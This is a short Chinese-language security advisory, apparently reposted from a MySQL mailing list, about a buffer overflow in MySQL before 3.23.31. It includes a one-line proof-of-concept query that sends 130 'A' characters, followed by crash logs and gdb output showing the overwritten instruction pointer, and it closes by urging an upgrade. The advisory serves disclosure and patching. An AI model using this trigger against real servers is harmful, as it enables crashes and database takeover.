所有小于 3.23.31 版本的 MySQL 都存在一个缓冲溢出漏洞导致MySQL 崩溃。使攻击者获得 mysqld 权限,而可以操纵所有数据库。攻击的前提是必须有一个合法的登录名和口令。
下面为最初发表于 MySQL 邮件列表的信件摘要。
==================================================
漏洞是由Jo?o Gouveia 于1月12日发现的:
步骤:
在第一个终端上启动 mysql:
spike:/var/mysql # /sbin/init.d/mysql start
在另外一个终端上输入:
jroberto@spike:~ > mysql -p -e ’select a.’`perl -e’printf("A"x130)’`’.b’
Enter password:
(没有反应?按^C退出)
在第一台终端上会显示:
- spike:/var/mysql#/usr/bin/safe_mysqld:line149:15557Segmentationfault
- nohup
- $ledir/mysqld--basedir=$MY_BASEDIR_VERSION--datadir=$DATADIR--skip-lockin
- g"$@">>$err_log2>&1>
- Numberofprocessesrunningnow:0
- mysqldrestartedonFriJan1207:10:54WET2001
- mysqlddaemonended
使用 gdb 显示结果如下:
- (gdb)run
- Startingprogram:/usr/sbin/mysqld
- [NewThread16897(managerthread)]
- [NewThread16891(initialthread)]
- [NewThread16898]
- /usr/sbin/mysqld:readyforconnections
- [NewThread16916]
- [SwitchingtoThread16916]
- ProgramreceivedsignalSIGSEGV,Segmentationfault.
- 0x41414141in??()
- (gdb)infoall-registers
- eax0x11
- ecx0x68104
- edx0x8166947135686471
- ebx0x414141411094795585
- esp0xbf5ff4080xbf5ff408
- ebp0x414141410x41414141
- esi0x414141411094795585
- edi0x00
- eip0x414141410x41414141
- eflags0x1024666118
- cs0x2335
- ss0x2b43
- ds0x2b43
- es0x2b43
- fs0x00
- gs0x00
其中的 eip 指示就是缓冲溢出了。
解决办法就是升级到 3.23.31。所以,各位如果还没有把数据库升级到最新版本,请赶快行动。
